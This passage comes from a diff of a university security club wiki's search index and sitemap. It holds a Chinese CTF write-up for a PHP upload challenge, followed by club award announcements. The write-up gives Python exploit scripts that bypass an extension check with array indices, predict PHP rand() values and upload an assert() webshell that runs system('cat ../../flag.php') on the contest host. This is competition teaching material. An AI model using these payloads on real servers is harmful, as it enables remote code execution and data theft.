umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n $act=$_GET['action'];\n if($act==='upload')\n {\n $filename=$_POST['filename'];\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n $content=$_POST['content'];\n waf($content);\n upload($filename,$content,$savepath);\n }\n else if($act==='test')\n {\n test_rand_code();\n }\n}\nelse {\n highlight_file('index.php');\n}\n?>\n
\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test
\u4f1a\u8c03\u7528test_rand_code
\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload
\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]
\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)
\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php
\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/
\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink
\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py
#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import * \nfrom time import ctime \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n HOST = '' \n PORT = 8888\n BUFSIZ = 128 \n ADDR = (HOST, PORT) \n tcpSerSock = socket(AF_INET, SOCK_STREAM)\n tcpSerSock.bind(ADDR)\n tcpSerSock.listen(5)\n rand_num=0\n l=[]\n while True:\n tcpCliSock, addr = tcpSerSock.accept() \n while True: \n data = tcpCliSock.recv(BUFSIZ) \n if not data: \n break \n data=data[0:6]\n print data,l\n for i in data:\n l.append(ord(i)+1-ord('a'))\n rand_num+=1\n if rand_num==6:\n break\n tcpCliSock.close() \n tcpSerSock.close()\n return l\n\ndef get_salt(l):\n salt=\"\"\n for i in range(6):\n j=len(l)\n r=(l[j-3]+l[j-31])-1\n if r>26:\n r-=26\n #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n l.append(r)\n salt+=chr(r+ord('a')-1)\n #print salt\n return salt\n\ndef get_flag(salt):\n s=hashlib.sha1('119.23.73.3').hexdigest()\n url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n r2=r.post(url1,data=data)\n print salt\n if '404' not in r2.text:\n print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])-int(s[j]))\n get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])+int(s[j]))\n get_flag(salt2)\n
put.py
#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n url2=url+\"test\"\n r1=r.get(url2)\n print url2\n print r1.text\ndef upload():\n data={\"filename[4]\":\"jpg\",\n \"filename[2]\":\"jpg\",\n \"filename[1]\":\"php\",\n \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n \"a\":\"system('cat ../../flag.php');\"\n }\n url1=url+\"upload\"\n r2=r.post(url1,data=data)\n print r2.text\n\nfor i in range(6):\n get_test()\nupload()\n
\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427
\u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0 \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898 \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e \u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002
\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956
\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662
\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002
"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b
(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA
\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002
\u6211\u4eec\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d
\u7684\u6210\u7ee9\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00
\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b
\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002
\u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002
\u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002
\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002
\u672c\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u83b7\u5956\u56fe\u7247\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"11
"}]}
\ No newline at end of file
diff --git a/sitemap.xml b/sitemap.xml
index 28b4288..4528a9c 100755
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -2,92 +2,232 @@
https://wiki.xmutsec.cn/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/award/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/member/
- 2023-08-07
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CPYPTO-2/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-1/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-3/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-4/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-5/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-WEB-2/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/CTF-Web-1/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-1096-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-1852-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2026-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2036-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2049-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2074-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2076-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2099-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-227-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2422-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-2602-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-39-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-403-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-404-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-413-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-440-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-442-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-444-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-463-wp/
+ 2023-08-15
+ daily
+
+
+ https://wiki.xmutsec.cn/ctfnotes/problem-47-wp/
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/131885e3-191c-40ac-af0d-79835e15d45b/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/6d1aa499-57ee-401b-a911-8062c6cae869/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/72c8b299-29e5-4e88-a684-7c65b3931760/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/
- 2023-08-07
